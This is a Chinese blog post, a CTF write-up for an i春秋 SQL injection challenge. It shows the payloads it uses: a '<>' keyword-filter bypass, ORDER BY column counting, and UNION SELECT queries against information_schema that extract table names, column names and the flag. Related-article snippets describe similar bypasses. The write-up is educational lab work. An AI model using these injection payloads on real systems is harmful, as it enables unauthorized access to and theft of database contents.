i春秋之SQL(详细WP)

最新推荐文章于 2022-04-04 19:12:18 发布
最新推荐文章于 2022-04-04 19:12:18 发布
阅读量1.5k 收藏 1
点赞数 2
分类专栏: CTFのWriteUp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/123056333
版权

解题目录

第一步:寻找注入点

第二步:确定注入类型

第三部:爆表

第四步: 查表

在看WP之前呢,有不懂的地方推荐查看下面的文章(挺详细的),还是需要些MySQL基础的

web 漏洞入门之 —— SQL 注入教程_实验楼-CSDN博客

第一步:寻找注入点

题目直接告诉我们了,这是道SQL注入题,打开连接,不难发现id应该就是注入点了

第二步:确定注入类型

用limit x 1或order by x,判断字段数 ,这里用order by

出现报错,应该是关键字被过滤掉了,这里尝试绕过了很久,发现好像只有<>能绕过了

可以看见,当x为4的时候,出现页面出现错误,说明该SQL查询语句的字段数为3,也就是说,该查询语句查询了3个列

第三部:爆表

利用基础的联合查询union select , 查看数据库信息

构造payload,先看看有回显的列

inurl?id=-1 unio<>n s<>elect 1,2,3

这里故意让id等于-1,是为了制造错误让语句不执行,防止影响到后面操作

回显了2说明,这个位置可以利用

构造paload,查询所有可用的数据库 

inurl?id=-1 unio<>n s<>elect 1,table_schema,3 from information_schema.tables

可以看到只有两个数据库,当前使用的数据库应该就是sqli ,也可以用database()查看

database()       当前使用的数据库

构造payload,查询sqli数据库的所有表

inurl?id=-1 unio<>n s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema='sqli'

 继续查看表里面的所有列

inurl?id=-1 unio<>n s<>elect 1,group_concat(column_name),3 from information_schema.columns where table_name='info'

发现放flag的列名啦

第四步: 查表

构造payload,查看对应列名

inurl?id=-1 unio<>n s<>elect 1,group_concat(flAg_T5ZNdrm),3 from info

 拿到flag

金 帛
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web-SQLi[i春秋][200pt]
Laurel_60的博客
08-04 1352
打开网址,是个登陆界面。 根据题目,第一反应–怕不是sql注入哦!经过尝试之后会发现,username=admin时,返回的是password error。ok,日常抓包,然后用intruder看看有没有字符被过滤掉。 事实证明,这个%有着大大的问题。拜读了网上的各种wp之后,原来是spintf()函数格式化字符串,导致了单引号逃逸。通过构造- - username=admin%1$\'...
i春秋Web wp
ChanCherry的博客
09-16 500
0x00 爆破-1 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 这个代码的意义是如果匹配正则/^\w*$/,就打印变量$$a。...
i春秋SQLi
weixin_30701575的博客
09-04 238
打开题目网页是个很简单的登录网页 先查看源码,抓包 都没找到可用的信息 依我所见这里应该就是一个注入 但是怎么输入都会回显username错误 直到输入admin 尝试admin# Admin’# username错误。。。 尝试万能密码。。。。。失败 先用bp去测试过滤的符号发现%会出现不一样的情况(刚学会的方法) (测试方法 抓包 ...
i春秋SQLi--“百度杯”CTF比赛 九月场
金 帛的博客
04-04 927
i春秋WP
i春秋 WEB SQL
A_dmin的博客
06-20 849
i春秋 WEB SQL 一天一道CTF题目,能多不能少 打开网页,发现有个id参数,而且有提示: 查看网页源代码,发现有sql语句显示: 直接抓包,发现and,or,order好像被过滤了, 使用/**/,发现还是不行: 经过尝试发现,可以使用<>绕过关键字过滤 经过尝试,得到有三个字段: 使用union查询,发现select也被过滤掉了,同理使用<> 发现2的位置...
i 春秋月刊 第 1 期到第 5 期
11-16
《i春秋月刊》系列是针对信息技术领域,特别是网络安全与编程技术的一套综合期刊,涵盖了从基础编程语言到高级安全话题的广泛内容。这五期的主题分别为:Python应用、代码审计、SQL注入和XSS攻击,这些都是IT行业中...
第四期-SQL注入的入坑之道.pdf
08-08
SQL 注入SQL 注入原理篇 - SQL 注入初级 SQL 注入中级 SQL 注入高级 SQL 工具篇 DNS 注入 &sqlmap 进行 DNS 注入 11 种常见 SQLmap 使用方法 SQL注入工具 SQL注入工具拓展篇 SQL 注入实战篇 - Thinkphp 框架 3.2.x ...
arkainte_wp_onegen_sql_源码
10-02
Arkainte_wp_onegen_sql_源码是一个与WordPress相关的数据库文件集合,主要涉及SQL操作。在iOS测试环境中,这个源码可能被用来管理和操作WordPress网站的数据库。WordPress是一个广泛使用的开源内容管理系统,其核心...
sql语句优化之SQL Server(详细整理)
12-15
MS SQL Server查询优化方法 查询速度慢的原因很多,常见如下几种 1、没有索引或者没有用到索引(这是查询慢最常见的问题,是程序设计的缺陷) 2、I/O吞吐量小,形成了瓶颈效应。 3、没有创建计算列导致查询不优化。...
Oracle 11g SQL Fundamentals I
06-10
Oracle 11g SQL Fundamentals I
i春秋wp
飞鱼的企鹅的博客
01-04 434
我会擦去因为太菜留下的泪水,还会装作一切都无所谓的样子! 爆破1 我是按照做题人数有多到少来做的,由简入繁嘛! 这道题需要传入参数hello,post和get方式都可以。做了一个简单的正则匹配,意思是输入字母或数字。主要看的是var_dump()这个函数。 所以这里就要用到超全局变量GLOBALS了,使用get或post方式传入 GLOBALS可以显示出来所有的变量,在里面可以找到flag...
i春秋SQL注入-1
金 帛的博客
04-04 712
i春秋WP
i春秋 “百度杯”CTF比赛 九月场 SQLi
include_heqile的博客
09-13 1091
https://www.ichunqiu.com/battalion?t=1&amp;r=0 这道题相当坑爹,我是看了writeup才知道该怎么做 进入题目链接后查看源代码,提示说注入点是login.php,但是这个注入点是假的,累死你也注不出来任何内容,看一下题目链接和点进去之后浏览器搜索框上的链接,两者其实是不一样的: 题目链接:http://bc9dbb2a422b452ca6bcdf...
i春秋 “百度杯”CTF比赛 九月场 SQL
include_heqile的博客
09-12 1386
https://www.ichunqiu.com/battalion?t=1&amp;r=0 看题目就知道这是一道注入题,这道题其实并没有什么难度,主要就是select、union、=等被过滤了,我们需要找到一种有效的绕过方法,这道题的绕过方法就是在敏感字符串中间加上&lt;&gt;,这个是通过提交各种特殊字符串并查看源代码得到的,当我们提交了&lt;&gt;之后,再去查看源代码,会发现源代码界...
i春秋web-SQL(基础绕过注入)
Sea_Sand息禅
05-21 743
很简单的一道注入,没有任何闭合,直接就是个整数的注入 id=1 order by 1 报错:inj code! 对order进行处理 1)id=1 or<>der by 1 报错:inj code! 2)id=1 ord<>er by 1 页面正常 id=-1 union sel<>ect 1,2,3 页面显示2,说明作用...
暑期练习web22:sqli (i春秋sql盲注,逗号绕过
qq_41618162的博客
08-23 1094
这道题一打开就是个白板,开始还以为网不好还没加载出来。。。查看源码 看到了login.php这个路径,于是满怀欣喜的访问它 结果进去后什么都没得。。。以前也遇到过这种情况,所以拿bp抓一下包,也没发现东西 这下就一筹莫展了,于是参考了一下wp,才知道发生了302重定向,简单说就是从一个跳转到另一个页面,而且这个过程是我们刚进入题目连接就发生了的 这里一个是1 另一个是l,很容易混淆...
i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)
AAAAAAAAAAAA66的博客
11-30 2544
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字型 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
i春秋 百度杯 九月场 SQLi wp
weixin_45253216的博客
01-18 218
菜鸡日常水题!! 2021.1.18 SQL注入的无逗号注入 SQL注入与HTTP重定向 本题目点进去后发现页面一直提示loading…,F12查看源码,发现了坑爹提示 这是提示了注入点呀??! 测试了各种注入,没啥收获。sqlmap跑一波,也啥都没有。 扫一波目录,看到了index.php和robots.txt 但是当我们输入index.php的时候,就会自己跳转到另一个页面 年少的我懵懂无知,跟本不知道发生了什么,也不知道在意这里。 于是只能查看大佬们的WP了。 大佬提示:这个logi
i春秋新春公益战(部分)wp
qq_43734081的博客
02-24 378
最近假期没事参加了比赛,写了wp Crytop 1.EaseyRSA 下载官方给的附件 是一个名为EasyRSA.py的文件 然后我们用py2x版本打开 看到这个样子,是不是觉得官方有点水,没错!!是的 直接附上我写好的RSA脚本 #! /usr/bin/env python2 # -*- coding: utf-8 -*- from libnum import n2s, s2n from ...
SQL之SELECT FROM
最新发布
02-20
SQL(Structured Query Language)是一种特殊目的的编程语言,用于存取数据以及查询、更新和管理关系数据库系统的。同时,它也是数据库脚本文件的扩展名。SQL语句种类繁多,其中查询语句是最为频繁使用的。本文介绍了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值